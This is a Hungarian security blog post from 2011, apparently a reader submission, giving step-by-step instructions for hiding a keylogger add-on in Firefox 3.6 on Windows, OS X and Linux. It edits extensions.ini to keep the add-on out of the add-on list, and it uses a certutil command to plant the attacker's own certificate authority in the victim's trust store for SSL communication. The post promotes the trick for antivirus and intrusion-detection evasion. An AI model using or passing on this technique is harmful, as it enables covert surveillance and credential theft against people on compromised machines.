Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Firefox kiegésztő elrejtése

2011.05.14. 13:33 | buherator | 1 komment

Z küldte az alábbi okosságot, hasznos trükk a rejtőzködésre, köszönjük:

Elképzelt szituáció: egy gépen (linux, windows, osx) van egy user jogú shell-ünk (grafikus felület nem szükséges). 

Cél: firefox (3.6) böngészőbe keyloggert tenni, elrejteni kommunikációt. FF4 alatt nem működik.

Készítsük el az ez_nem_keylogger.xpi -t, securitytube-on vannak példák. Vagy használjunk tetszőleges addon-t.

define

Win
$profile_path: \ C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\hxxxxxzz.default

OSX
$profile_path: \
/Users/x/Library/Application Support/Firefox/Profiles/xyzxyz.default

Ubuntu
$profile_path:
/home/x/.mozilla/firefox/xyzxyz.default

XPI-t kicsomagolva másoljuk be a $profile_path/extensions/xyz@zxy.hu könyvtárba, install.rdf-et töröljük. 

Utána a $profile_path/extension.ini -be szúrjuk a következő sort:

ExtensionXY=$profile_path/extensions/xyz@zxy.hu

firefox elindítása/újraindítása után az addon működik, de nincs az addon listában.

SSL feature addon:

Ha SSL-ben szeretnénk kommunikálni a cél szerverrel, és nem szeretnénk tanúsítványra pénzt költeni, akkor töltsük le a megfelelő NSS (Network Security Services) binárist/forrást (vagy nyomjunk fel egy alkalmas RA-t :) ), majd a következő paranccsal tudjuk a saját CA-nkat importálni a tanúsítványtárba (feltéve, hogy a profile könytárban vagyunk, ahol a cert8.db is van):

certutil -A -n Cert1 -i cert.crt -t "TCu,TCu,TCu" -d . 

A hack bonyolultsága felér egy fagolyó bonyolultságával. Cserébe multiplatform, AV/IDS evasion, proxy kompatibilis :)

 

Címkék: firefox rootkit addon keylogger

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.